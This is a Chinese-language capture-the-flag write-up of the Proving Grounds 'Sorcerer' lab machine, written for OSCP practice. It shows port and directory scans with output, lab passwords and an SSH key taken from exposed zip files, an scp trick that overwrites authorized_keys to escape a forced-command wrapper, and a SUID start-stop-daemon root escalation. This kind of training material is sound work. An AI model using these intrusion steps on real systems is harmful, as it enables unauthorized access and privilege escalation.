前言
在未来将会持续更新Proving Grounds Practice内的靶机Write Up,近期本人也通过了OSCP考试,所以将打靶的所有笔记共享出来,所有的靶机推荐来源于以下链接:https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159
不过其中有一些机器已经不在Proving Grounds Practice中了,所以就没有了Write Up,本系列将有大约40台左右的机器,如果你在练习过程中遇到了困难,建议先自己进行挖掘,然后再查看Write Up,始终需要记得:Try Harder。
本文结构
一般来说本系列的Write Up将以以下的结构来进行
-
端口扫描 -
网页枚举或端口枚举 -
突破入口 -
特权提升
端口枚举
┌──(aaron㉿aaron)-[~/Desktop/pg/Sorcerer]
└─$ sudo nmap -p22,80,111,8080 -A 192.168.171.100
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-16 07:10 EDT
Nmap scan report for 192.168.171.100
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 81:2a:42:24:b5:90:a1:ce:9b:ac:e7:4e:1d:6d:b4:c6 (RSA)
| 256 d0:73:2a:05:52:7f:89:09:37:76:e3:56:c8:ab:20:99 (ECDSA)
|_ 256 3a:2d:de:33:b0:1e:f2:35:0f:8d:c8:d7:8f:f9:e0:0e (ED25519)
80/tcp open http nginx
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 44362/udp mountd
| 100005 1,2,3 45093/tcp mountd
| 100021 1,3,4 41331/tcp nlockmgr
| 100021 1,3,4 58919/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
8080/tcp open http Apache Tomcat 7.0.4
|_http-title: Apache Tomcat/7.0.4
|_http-favicon: Apache Tomcat
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: VoIP adapter|general purpose
Running (JUST GUESSING): Cisco embedded (88%), Linux 2.6.X (88%)
OS CPE: cpe:/h:cisco:unified_call_manager cpe:/o:linux:linux_kernel:2.6.26
Aggressive OS guesses: Cisco Unified Communications Manager VoIP adapter (88%), Linux 2.6.26 (PCLinuxOS) (88%), Linux 2.6.32 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 260.90 ms 192.168.45.1
2 260.87 ms 192.168.45.254
3 262.14 ms 192.168.251.1
4 262.31 ms 192.168.171.100
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.09 seconds
针对性枚举
Port 80
──(aaron㉿aaron)-[~/Desktop/pg/Sorcerer]
└─$ feroxbuster --url "http://192.168.171.100"
404 GET 7l 12w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 1l 3w 14c http://192.168.171.100/
[#######>------------] - 3m 11537/30000 3m found:1 errors:6
[#######>------------] - 3m 11530/30000 72/s http://192.168.171.100/
[####################] - 6m 30000/30000 0s found:1 errors:9
[####################] - 6m 30000/30000 77/s http://192.168.171.100/
在80端口上没找到有用的东西。
Port 111
在111端口可以查看HackTricks里面的Pen Test-rpcblind (https://book.hacktricks.xyz/network-services-pentesting/pentesting-rpcbind)文章,在端口扫描的时候如果发现类似于·rpc的服务开放着,那就有可能可以用来列出或者下载(可能还支持上传)文件。在这里使用rpcinfo来获得更多的信息
┌──(aaron㉿aaron)-[~/Desktop/pg/Sorcerer]
└─$ rpcinfo 192.168.171.100
program version netid address service owner
100000 4 tcp 0.0.0.0.0.111 portmapper superuser
100000 3 tcp 0.0.0.0.0.111 portmapper superuser
100000 2 tcp 0.0.0.0.0.111 portmapper superuser
100000 4 udp 0.0.0.0.0.111 portmapper superuser
100000 3 udp 0.0.0.0.0.111 portmapper superuser
100000 2 udp 0.0.0.0.0.111 portmapper superuser
100000 4 local /run/rpcbind.sock portmapper superuser
100000 3 local /run/rpcbind.sock portmapper superuser
100005 1 udp 0.0.0.0.233.245 mountd superuser
100005 1 tcp 0.0.0.0.174.123 mountd superuser
100005 2 udp 0.0.0.0.213.200 mountd superuser
100005 2 tcp 0.0.0.0.176.95 mountd superuser
100005 3 udp 0.0.0.0.173.74 mountd superuser
100005 3 tcp 0.0.0.0.176.37 mountd superuser
100003 3 tcp 0.0.0.0.8.1 nfs superuser
100003 4 tcp 0.0.0.0.8.1 nfs superuser
100227 3 tcp 0.0.0.0.8.1 nfs_acl superuser
100003 3 udp 0.0.0.0.8.1 nfs superuser
100227 3 udp 0.0.0.0.8.1 nfs_acl superuser
100021 1 udp 0.0.0.0.230.39 nlockmgr superuser
100021 3 udp 0.0.0.0.230.39 nlockmgr superuser
100021 4 udp 0.0.0.0.230.39 nlockmgr superuser
100021 1 tcp 0.0.0.0.161.115 nlockmgr superuser
100021 3 tcp 0.0.0.0.161.115 nlockmgr superuser
100021 4 tcp 0.0.0.0.161.115 nlockmgr superuser
使用rpcinfo之后可以发现nfs服务是开放的,然后可能代表着2049端口也同样开放着,接着使用nmap去获取更多的信息。
┌──(aaron㉿aaron)-[~/Desktop/pg/Sorcerer]
└─$ sudo nmap -p2049 -A 192.168.171.100
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-16 07:15 EDT
Nmap scan report for 192.168.171.100
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
2049/tcp open nfs 3-4 (RPC #100003)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: firewall
Running: Fortinet embedded
OS details: Fortinet FortiGate-50B or 310B firewall
Network Distance: 4 hops
TRACEROUTE (using port 2049/tcp)
HOP RTT ADDRESS
1 257.93 ms 192.168.45.1
2 257.91 ms 192.168.45.254
3 258.83 ms 192.168.251.1
4 258.83 ms 192.168.171.100
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.25 seconds
2049端口开放着,那么就跟着nfs-pentesting这篇文章的思路来走(https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting)
┌──(aaron㉿aaron)-[~/Desktop/pg/Sorcerer]
└─$ showmount -e 192.168.171.100
Export list for 192.168.171.100:
但是这里并没有列出任何共享的东西。
┌──(aaron㉿aaron)-[~/Desktop/pg/Sorcerer]
└─$ nmap -sV --script=nfs-* 192.168.171.100 -p111,2049
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-16 07:29 EDT
Nmap scan report for 192.168.171.100
Host is up (0.78s latency).
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2-4 (RPC #100000)
|_nfs-showmount: No NFS mounts available
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 44362/udp mountd
| 100005 1,2,3 45093/tcp mountd
| 100021 1,3,4 41331/tcp nlockmgr
| 100021 1,3,4 58919/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs 3-4 (RPC #100003)
8080端口
使用 gobuster 扫描发现这里有一个 /manager 的目录
访问目录发现显示了Tomcat的密码 tomcat:s3cret。
对端口1-10000进行扫描
──(aaron㉿aaron)-[~/Desktop/pg/Sorcerer]
└─$ sudo nmap -p1-10000 -Pn -sS 192.168.171.100
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-16 08:24 EDT
Nmap scan report for 192.168.171.100
Host is up (0.26s latency).
Not shown: 9994 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
7742/tcp open msss
8080/tcp open http-proxy
7742端口
这里是一个登录界面,但是我手上并没有有效的用户名和密码,用 feroxbuster 去扫描整个目录。
┌──(aaron㉿aaron)-[~/Desktop/pg/Sorcerer]
└─$ feroxbuster --url "http://192.168.171.100:7742"
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / _/ | | |__
| |___ | | | __, __/ / | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.171.100:7742
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 7l 12w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 65l 117w 1219c http://192.168.171.100:7742/
301 GET 7l 12w 178c http://192.168.171.100:7742/default => http://192.168.171.100:7742/default/
301 GET 7l 12w 178c http://192.168.171.100:7742/zipfiles => http://192.168.171.100:7742/zipfiles/
200 GET 13l 81w 4749c http://192.168.171.100:7742/zipfiles/francis.zip
200 GET 13l 82w 4741c http://192.168.171.100:7742/zipfiles/miriam.zip
200 GET 13l 82w 4733c http://192.168.171.100:7742/zipfiles/sofia.zip
200 GET 39l 203w 13898c http://192.168.171.100:7742/zipfiles/max.zip
[####################] - 4m 60005/60005 0s found:7 errors:7
[####################] - 4m 30000/30000 135/s http://192.168.171.100:7742/
[####################] - 4m 30000/30000 138/s http://192.168.171.100:7742/default/
[####################] - 1s 30000/30000 28874/s http://192.168.171.100:7742/zipfiles/ => Directory listing
扫描之后发现了这里有一些zip文件在zipfiles目录下面。
francis
max
miriam
sofia
在这里可以看到一个tomcat-users.xml.bak文件,从中可以得到密码。
tomcat:VTUD2XxJjf5LPmu6
然后还发现了一个id_rsa文件,所以尝试用id_rsa 去登录.
但是显示access denied. 查看一下里面的scp_wrapper.sh脚本。
这意味着当想要用ssh连接到用户max的时候只能在开始的时候以scp来进行连接,当scp通过SSH连接的时候可以使用id_rsa去进行连接,之后我们可以把本地的sh脚本文件覆盖max用户的文件,使用特定的命令例如说bash。
现在移动 id_rsa 到本地的/home文件夹,然后使用 scp 去上传 authorized_keys, 然后使用相同的方式来覆盖 scp_wrapper.sh。
┌──(aaron㉿aaron)-[~/…/max/home/max/.ssh]
└─$ cat authorized_keys.bak
no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty,command="/home/max/scp_wrapper.sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC39t1AvYVZKohnLz6x92nX2cuwMyuKs0qUMW9Pa+zpZk2hb/ZsULBKQgFuITVtahJispqfRY+kqF8RK6Tr0vDcCP4jbCjadJ3mfY+G5rsLbGfek3vb9drJkJ0+lBm8/OEhThwWFjkdas2oBJF8xSg4dxS6jC8wsn7lB+L3xSS7A84RnhXXQGGhjGNfG6epPB83yTV5awDQZfupYCAR/f5jrxzI26jM44KsNqb01pyJlFl+KgOs1pCvXviZi0RgCfKeYq56Qo6Z0z29QvCuQ16wr0x42ICTUuR+Tkv8jexROrLzc+AEk+cBbb/WE/bVbSKsrK3xB9Bl9V9uRJT/faMENIypZceiiEBGwAcT5lW551wqctwi2HwIuv12yyLswYv7uSvRQ1KU/j0K4weZOqDOg1U4+klGi1is3HsFKrUZsQUu3Lg5tHkXWthgtlROda2Q33jX3WsV8P3Z4+idriTMvJnt2NwCDEoxpi/HX/2p0G5Pdga1+gXeXFc88+DZyGVg4yW1cdSR/+jTKmnluC8BGk+hokfGbX3fq9BIeiFebGnIy+py1e4k8qtWTLuGjbhIkPS3PJrhgSzw2o6IXombpeWCMnAXPgZ/x/49OKpkHogQUAoSNwgfdhgmzLz06MVgT+ap0To7VsTvBJYdQiv9kmVXtQQoUCAX0b84fazWQQ== max@sorcerer
┌──(aaron㉿aaron)-[~/…/max/home/max/.ssh]
└─$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC39t1AvYVZKohnLz6x92nX2cuwMyuKs0qUMW9Pa+zpZk2hb/ZsULBKQgFuITVtahJispqfRY+kqF8RK6Tr0vDcCP4jbCjadJ3mfY+G5rsLbGfek3vb9drJkJ0+lBm8/OEhThwWFjkdas2oBJF8xSg4dxS6jC8wsn7lB+L3xSS7A84RnhXXQGGhjGNfG6epPB83yTV5awDQZfupYCAR/f5jrxzI26jM44KsNqb01pyJlFl+KgOs1pCvXviZi0RgCfKeYq56Qo6Z0z29QvCuQ16wr0x42ICTUuR+Tkv8jexROrLzc+AEk+cBbb/WE/bVbSKsrK3xB9Bl9V9uRJT/faMENIypZceiiEBGwAcT5lW551wqctwi2HwIuv12yyLswYv7uSvRQ1KU/j0K4weZOqDOg1U4+klGi1is3HsFKrUZsQUu3Lg5tHkXWthgtlROda2Q33jX3WsV8P3Z4+idriTMvJnt2NwCDEoxpi/HX/2p0G5Pdga1+gXeXFc88+DZyGVg4yW1cdSR/+jTKmnluC8BGk+hokfGbX3fq9BIeiFebGnIy+py1e4k8qtWTLuGjbhIkPS3PJrhgSzw2o6IXombpeWCMnAXPgZ/x/49OKpkHogQUAoSNwgfdhgmzLz06MVgT+ap0To7VsTvBJYdQiv9kmVXtQQoUCAX0b84fazWQQ== max@sorcerer
┌──(aaron㉿aaron)-[~/…/max/home/max/.ssh]
└─$ scp ./authorized_keys [email protected]:/home/max/.ssh/authorized_keys
scp: Received message too long 1094927173
scp: Ensure the remote shell produces no output for non-interactive sessions.
┌──(aaron㉿aaron)-[~/…/max/home/max/.ssh]
└─$ scp -O ./authorized_keys [email protected]:/home/max/.ssh/authorized_keys
authorized_keys 100% 738 1.7KB/s 00:00
然后使用 id_rsa 去登录max。
提升权限
系统信息
开放的端口
存在的用户
有用的软件
SUID
发现有一个suid 的应用 start-stop-daemon, 在 GTFOBins里面查看
使用SUID来提权。
最后拿到root。
END
OSCP(Offensive Security Certified Professional),中文称国际注册渗透测试专家认证,是由Offensive Security推出的200等级的证书,主要面向领域:渗透测试。
OSCP 证书是一种技术性证书,涵盖渗透测试和攻击技术方面。持有此证书的人员已通过对目标网络进行渗透测试并获得管理员访问权限的实际考试。该证书是由 Offense Security 出品,考试内容涉及网络渗透测试、漏洞挖掘、漏洞利用等方面。OSCP 考试难度较高,需要实际的技能和经验,持有此证书可证明持有人具有深入了解渗透测试及相关攻击技术的实际能力。
如果你觉得本篇文章对你有帮助,点个关注好不好呢,还可以点个在看,感谢你的支持:)))))))))))))
联系我
WeChat ID:wengchensmile
Email Address: [email protected](个人)
原文始发于微信公众号(Aaron与安全的那些事):Proving Grounds Practice-Sorcerer
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论